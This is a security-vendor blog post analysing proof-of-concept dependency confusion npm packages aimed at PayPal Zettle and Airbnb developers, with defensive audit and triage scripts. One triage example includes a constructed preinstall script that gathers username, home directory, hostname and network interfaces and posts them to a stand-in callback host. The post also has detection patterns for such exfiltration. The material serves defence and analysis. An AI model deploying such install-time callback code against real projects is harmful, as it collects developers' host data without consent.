New npm PoC packages target PayPal Zettle, Airbnb developers

September 12, 2023 By Ax Sharma

4 minute read time

Sonatype has identified several npm packages that are named after internal dependencies purportedly used by PayPal Zettle and Airbnb developers.

These packages, flagged by our automated malware detection systems, exploit the well-known dependency confusion technique: an attacker publishes a public npm package under the same name as an organization’s private, internal dependency so that a misconfigured package manager or build pipeline resolves the public copy instead of the internal one. Had they been malicious, the packages would have given their author code execution inside these organizations’ development environments. However, our analysis concludes these are proof-of-concept (PoC) packages published by pen testers hoping to collect a bug bounty.
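The practical question for a defender is whether their own builds are exposed to this kind of substitution. The following script is an added example (not Sonatype’s code and not code from the packages discussed here) that audits a project’s package.json against its .npmrc and reports every dependency the public registry could satisfy: a scoped name whose scope is not pinned to a private registry, or an unscoped name carrying a prefix the organization reserves for internal packages. The sample project, the registry host npm.example.internal and the scope @acme-internal are all constructed for illustration.

```javascript
// Added example (not Sonatype's code, not from the packages' author):
// audit a project's package.json and .npmrc for dependency-confusion
// exposure. A dependency is exposed when the public registry could satisfy
// it: a scoped name whose scope is not pinned to a private registry, or an
// unscoped name that matches a prefix the organization uses internally.
// All inputs are constructed; "npm.example.internal" and "@acme-internal"
// are hypothetical.

const PUBLIC_REGISTRY = /^https?:\/\/registry\.npmjs\.org\/?$/;

// Hypothetical prefixes an organization reserves for unscoped internal packages.
const INTERNAL_PREFIXES = ["airbnb-"];

// Parse only the .npmrc keys that decide where a name is resolved:
// "registry=" (default) and "@scope:registry=" (per-scope override).
function parseNpmrc(text) {
  const cfg = { registry: "https://registry.npmjs.org/", scopes: {} };
  for (const raw of text.split("\n")) {
    const line = raw.trim();
    if (!line || line.startsWith(";") || line.startsWith("#")) continue;
    const eq = line.indexOf("=");
    if (eq === -1) continue;
    const key = line.slice(0, eq).trim();
    const value = line.slice(eq + 1).trim();
    if (key === "registry") {
      cfg.registry = value;
    } else if (key.startsWith("@") && key.endsWith(":registry")) {
      cfg.scopes[key.slice(0, -":registry".length)] = value;
    }
  }
  return cfg;
}

function isPrivateRegistry(url) {
  return typeof url === "string" && url.length > 0 && !PUBLIC_REGISTRY.test(url);
}

// Returns one {name, reason} finding per dependency the public registry could satisfy.
function auditDependencyConfusion(packageJsonText, npmrcText, internalPrefixes = INTERNAL_PREFIXES) {
  const pkg = JSON.parse(packageJsonText);
  const cfg = parseNpmrc(npmrcText);
  const deps = Object.assign({}, pkg.dependencies, pkg.devDependencies, pkg.optionalDependencies);
  const findings = [];
  for (const name of Object.keys(deps)) {
    if (name.startsWith("@")) {
      const scope = name.slice(0, name.indexOf("/"));
      if (!isPrivateRegistry(cfg.scopes[scope])) {
        findings.push({ name, reason: `scope ${scope} is not pinned to a private registry in .npmrc` });
      }
    } else if (internalPrefixes.some((p) => name.startsWith(p))) {
      // Unscoped internal names are the classic dependency-confusion target: a
      // public default registry, or a private registry that proxies npmjs.org,
      // will hand out whoever publishes that name publicly (usually with a
      // higher version than the internal one).
      findings.push({
        name,
        reason: isPrivateRegistry(cfg.registry)
          ? "unscoped internal name; confirm the private registry does not fall through to npmjs.org for it"
          : "unscoped internal name resolved against the public registry",
      });
    }
  }
  return findings;
}

// Constructed sample project. "@zettle-bo/dashboard" is one of the names from
// the article; depending on it here is purely illustrative.
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: "example-app",
  dependencies: {
    "@zettle-bo/dashboard": "^1.2.0", // scope pinned below: no finding
    "@acme-internal/auth": "^3.0.0", // scope not pinned: exposed
    "airbnb-env": "^2.0.0", // unscoped, internal-looking: exposed
    react: "^18.2.0", // genuinely public: no finding
  },
});

const SAMPLE_NPMRC = [
  "registry=https://registry.npmjs.org/",
  "@zettle-bo:registry=https://npm.example.internal/repository/npm-private/",
  "//npm.example.internal/:_authToken=${NPM_TOKEN}",
].join("\n");

for (const f of auditDependencyConfusion(SAMPLE_PACKAGE_JSON, SAMPLE_NPMRC)) {
  console.log(`${f.name}: ${f.reason}`);
}
```

The audit only reads configuration, so it cannot tell whether a private registry silently proxies npmjs.org for names it does not hold; that fall-through is exactly what dependency confusion relies on, which is why the unscoped case is reported even when the default registry is private. Pinning every internal scope with `@scope:registry=` in .npmrc, keeping internal packages scoped, and claiming the organization’s scopes and names on the public registry are the standard mitigations.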

Counterfeit npm packages target Zettle by PayPal

Tracked as sonatype-2023-3911, the packages published under the @zettle-bo npm scope include the following. Each package has just one version, “35.0.0”, published to npm: a deliberately high version number, as is typical of dependency confusion payloads, so that it outranks any internal version when resolution falls through to the public registry.

@zettle-bo/account-settings

@zettle-bo/account-statement

@zettle-bo/apps

@zettle-bo/bank-settings

@zettle-bo/bootstrapper

@zettle-bo/capital

@zettle-bo/cash-register

@zettle-bo/customers

@zettle-bo/dashboard

@zettle-bo/direct-debit

@zettle-bo/integrations

@zettle-bo/inventory

@zettle-bo/invoices

@zettle-bo/pp-profile-widget

@zettle-bo/products

@zettle-bo/react

@zettle-bo/react-router-dom

@zettle-bo/react-spa

@zettle-bo/receipts

@zettle-bo/routes

@zettle-bo/sales-trends

@zettle-bo/settings

@zettle-bo/shell

@zettle-bo/staff-account

@zettle-bo/vertical-navigation

Upon installation, these packages attempt to download and install other npm packages, e.g. “lolzettle-bololbank-settings”, from the author’s web server. At the time of writing, the URL returns an empty JSON object ({}) rather than functional code.

[Screenshot of the package code: it attempts to download and install other npm packages from the author’s web server, and the URL returns a blank object as opposed to functional code]

Sonatype confirmed with the author of these packages, a known security researcher in the industry, that they are part of an ethical research experiment and that no malicious payload or activity is involved. The researcher did not, however, say whether they had earned a bug bounty yet.

Airbnb

Tracked as sonatype-2023-3913 are the following packages, which appear to target Airbnb developers:

airbn-geetest3

airbnb-env

airbnb-erf

airbnb-i18n-polyglot

airbnb-l10n

airbnb-mediator

airbnb-moment-more-format

These packages collect the system’s username, home directory path, hostname, IP address, and other basic host information, and transmit these to the author’s servers.

[Screenshot of the package code: it collects the system’s username, home directory path, hostname, IP address, and basic information and transmits these to the author’s servers]
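Both families of packages share the shape of a dependency confusion callback: code that runs at install time, gathers enough host identity to prove which machine it landed on, and phones home. The script below is an added example (not Sonatype’s code and not code from the packages analysed here) showing how to triage a package for those two traits offline: it reads the manifest for install lifecycle scripts (the mechanism npm provides for running code on install) and scans the package’s sources for host-identity collectors and outbound channels. The sample package, its 35.0.0 version, the setup.js script and the callback host callback.example.invalid are all constructed for illustration.

```javascript
// Added example (not Sonatype's code, not code from the packages analysed
// here): offline static triage of an npm package for the two behaviours the
// article describes. It flags (1) install lifecycle scripts, the hook a
// package uses to run code on install, and (2) source that gathers host
// identity (username, home directory, hostname, IP) and makes an outbound
// call. The sample package below is constructed; "callback.example.invalid"
// is a hypothetical callback host.

const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Host-identity collectors commonly seen in dependency-confusion PoCs.
const HOST_INFO_PATTERNS = {
  username: /os\.userInfo\s*\(|process\.env\.(USER|USERNAME)\b/,
  homedir: /os\.homedir\s*\(|process\.env\.(HOME|USERPROFILE)\b/,
  hostname: /os\.hostname\s*\(/,
  ipAddress: /os\.networkInterfaces\s*\(/,
};

// Ways the collected data typically leaves the machine.
const EXFIL_PATTERNS = {
  httpRequest: /\bhttps?\.(request|get)\s*\(|\bfetch\s*\(|\baxios\b/,
  dns: /\bdns\.(lookup|resolve)/,
  childProcess: /child_process|execSync\s*\(|spawn\s*\(/,
};

const URL_PATTERN = /https?:\/\/[^\s"'`)]+/g;

// manifestText: the package's package.json as a string.
// sources: { "relative/path.js": "file contents", ... }
function triagePackage(manifestText, sources) {
  const manifest = JSON.parse(manifestText);
  const scripts = manifest.scripts || {};
  const lifecycleScripts = LIFECYCLE_HOOKS.filter((hook) => typeof scripts[hook] === "string");

  const code = Object.values(sources).join("\n");
  const hostInfo = Object.keys(HOST_INFO_PATTERNS).filter((k) => HOST_INFO_PATTERNS[k].test(code));
  const exfil = Object.keys(EXFIL_PATTERNS).filter((k) => EXFIL_PATTERNS[k].test(code));
  const urls = Array.from(new Set(code.match(URL_PATTERN) || []));

  let verdict = "no install-time indicators";
  if (lifecycleScripts.length && exfil.length) {
    verdict = hostInfo.length
      ? "install-time host fingerprinting with outbound call"
      : "install-time outbound call";
  } else if (lifecycleScripts.length) {
    verdict = "install script present; review manually";
  }
  return { name: manifest.name, version: manifest.version, lifecycleScripts, hostInfo, exfil, urls, verdict };
}

// Constructed sample: a high version number, a preinstall hook, and a script
// that posts host details to a callback server.
const SAMPLE_MANIFEST = JSON.stringify({
  name: "example-internal-widget",
  version: "35.0.0",
  scripts: { preinstall: "node setup.js" },
});

const SAMPLE_SOURCES = {
  "setup.js": `
const os = require("os");
const https = require("https");
const payload = JSON.stringify({
  user: os.userInfo().username,
  home: os.homedir(),
  host: os.hostname(),
  ifaces: os.networkInterfaces(),
  cwd: process.cwd(),
});
const req = https.request("https://callback.example.invalid/collect", { method: "POST" });
req.end(payload);
`,
};

// Constructed benign package for comparison: no lifecycle hooks, no collectors.
const BENIGN_MANIFEST = JSON.stringify({ name: "pad-helper", version: "1.0.0" });
const BENIGN_SOURCES = { "index.js": "module.exports = (s, n) => String(s).padStart(n);" };

console.log(JSON.stringify(triagePackage(SAMPLE_MANIFEST, SAMPLE_SOURCES), null, 2));
console.log(JSON.stringify(triagePackage(BENIGN_MANIFEST, BENIGN_SOURCES), null, 2));
```

This is a first-pass heuristic, not a verdict: minified or obfuscated code will not match these patterns, and legitimate native-addon packages also use install scripts. What it does reliably surface is the combination the PoCs above exhibit, an install hook plus host fingerprinting plus a hard-coded URL. The cheapest operational control for the install-hook half is to run `npm install --ignore-scripts` (or set `ignore-scripts=true` in .npmrc) in CI and on developer machines, so that a confused dependency cannot execute anything merely by being fetched.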

Once again, given the metadata included in these packages and the absence of outright malicious code, this appears to be PoC research.

Although these packages may be nothing more than bug bounty exercises, real-world threat actors have frequently targeted, and continue to target, open source ecosystems like npm and PyPI with novel malware such as cryptojackers, infostealers, and hijacked libraries, in order to compromise developers and ultimately poison the software supply chain.

While these packages appear to be bug-bounty exercises, Sonatype’s products such as Repository Firewall and Lifecycle track actual attacks and vulnerabilities and provide detailed insights to keep Potentially Unwanted Applications (PUAs), malware, and vulnerable components from reaching your builds:

[Screenshot from the Sonatype database showing this issue tracked as sonatype-2023-3911, with the npm packages classified as potentially unwanted applications (PUAs)]

Users of Sonatype Repository Firewall can rest easy knowing that, whether these packages are just a PoC or actually malicious, they would automatically be blocked from reaching development builds. Either way, you don’t want them in your software development life cycle.

Tags: npm, dependency confusion, DevZone, Malware Analysis

Written by Ax Sharma

Ax is a Security Researcher at Sonatype and Engineer who holds a passion for perpetual learning. His works and expert analyses have frequently been featured by leading media outlets. Ax's expertise lies in security vulnerability research, reverse engineering, and software development. In his spare time, he loves exploiting vulnerabilities ethically and educating a wide range of audiences.